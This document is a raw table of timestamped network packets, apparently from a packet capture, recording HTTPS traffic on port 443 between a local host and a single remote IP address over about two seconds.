Jan 1, 2025 08:31:19.256866932 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.256875992 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.256920099 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.260108948 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.260155916 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.260256052 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.260298014 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.262695074 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.262778044 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.263012886 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.263063908 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.265477896 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.265526056 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.265541077 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.265583038 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.270927906 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.270968914 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.270982027 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.271019936 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.272805929 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.272847891 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.272874117 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.272931099 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.279165983 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.279221058 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.279329062 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.279397011 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.290374041 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.290409088 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.290441036 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.290445089 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.290474892 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.290482998 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.296941996 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.296978951 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.296988010 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.296993971 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.297023058 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.297032118 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.301013947 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.301064968 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.301084042 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.301090956 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.301116943 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.301136971 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.307622910 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.307667017 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.307672977 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.307679892 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.307712078 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.314310074 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.314352036 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.314373970 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.314378977 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.314419031 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.320638895 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.320698977 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.320744991 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.320784092 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.324928999 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.324982882 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.325063944 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.325098991 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.331413031 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.331465960 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.331561089 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.331599951 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.339823961 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.339868069 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.339906931 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.339960098 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.343599081 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.343647003 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.343693972 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.343750000 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.346942902 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.346980095 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.347013950 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.347050905 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.349605083 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.349642992 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.349651098 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.349656105 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.349673986 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.349694014 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.352236986 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.352267027 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.352273941 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.352278948 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.352303028 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.352312088 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.357641935 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.357692957 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.357744932 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.357784986 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.359544039 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.359596014 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.359678984 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.359719038 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.365988016 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.366038084 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.366043091 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.366049051 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.366074085 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.366086960 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.377103090 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.377172947 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.377281904 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.377320051 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.383836031 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.383889914 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.384004116 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.384046078 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.387947083 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.387991905 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.388240099 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.388323069 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.395057917 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.395114899 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.395248890 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.395292044 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.410017014 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.410079002 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.410185099 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.410226107 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.414335012 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.422842026 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.422920942 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.422992945 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.423038006 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.429043055 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.429085970 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.429218054 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.429260969 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.436569929 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.436600924 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.436640024 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.436644077 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.436655998 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.436681032 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.438786030 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.438848019 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.439414024 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.439456940 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.439471960 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.439517975 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.439527035 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.439534903 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.439578056 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.442024946 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.442080975 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.442156076 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.442207098 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.445810080 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.445858002 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.445945978 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.446003914 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.450907946 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.450942993 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.450951099 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.450957060 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.450993061 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.457221985 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.457283974 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.457461119 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.457528114 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.458093882 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.458277941 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.458340883 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.458340883 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.458345890 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.458379984 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.464055061 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.464082956 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.464095116 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.464098930 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.464121103 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.464164972 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.481693983 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.481744051 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.481751919 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.481756926 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.481781960 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.481792927 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.482834101 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.482870102 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.483046055 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.483098984 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.483763933 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.483819008 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.483882904 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.483922005 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.485327959 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.485357046 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.485367060 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.485371113 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.485411882 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.496928930 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.496961117 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.497001886 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.497005939 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.497034073 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.497050047 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.509658098 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.509697914 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.509706020 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.509711981 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.509742022 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.509752035 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.515973091 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.516010046 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.516031981 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.516037941 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.516052008 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.516072035 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.523444891 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.523472071 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.523484945 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.523488045 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.523535967 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.523535967 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.526278973 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.526320934 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.526423931 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.526468992 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.526727915 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.526767969 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.526954889 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.526997089 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.528950930 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.528981924 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.528991938 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.528995037 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.529028893 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.532680988 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.532725096 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.532738924 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.532743931 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.532769918 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.532780886 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.537631035 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.537700891 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.537727118 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.537765980 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.544011116 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.544049025 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.544804096 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.544856071 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.544878006 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.544920921 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.550793886 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.550827026 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.550831079 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.550837040 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.550863981 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.568310976 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.568366051 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.568433046 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.568487883 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.569734097 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.569767952 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.569788933 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.569797039 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.569813013 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.569828033 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.570377111 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.570419073 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.570564985 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.570611954 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.571917057 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.571958065 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.572165012 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.572205067 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.583669901 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.583724976 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.583765984 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.583828926 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.596441984 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.596483946 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:19.803335905 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:19.807791948 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:20.071830034 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:20.071837902 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:20.071861982 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:20.071962118 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:20.071968079 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:20.071978092 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:20.072065115 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:20.072073936 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:20.072086096 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:20.072093010 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:20.072181940 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:20.072181940 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:20.072191954 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:20.072206020 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:20.072207928 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:20.072364092 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:20.072364092 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:20.072371006 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:20.072387934 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:20.072487116 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:20.283328056 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:20.283382893 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:20.707340002 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:20.707411051 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:21.255032063 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:21.255045891 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:21.255055904 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:21.255108118 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:21.280628920 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:21.280638933 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:21.280648947 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:21.280695915 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:21.280702114 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:21.280715942 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:21.280740023 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:21.280742884 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:21.280786991 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:21.280791044 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:21.280806065 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:21.280826092 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:21.280828953 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:21.280838013 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:21.280848026 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:21.280850887 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:21.280900955 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:21.280982971 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:21.280988932 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:21.281034946 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:21.480995893 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:21.481012106 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:21.481071949 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:21.510974884 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:21.510978937 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:21.511003971 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:21.511018038 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:21.511044025 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:21.511059999 CET	443	49914	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:21.511071920 CET	49914	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:21.511111021 CET	49914	443	192.168.2.4	118.178.60.9
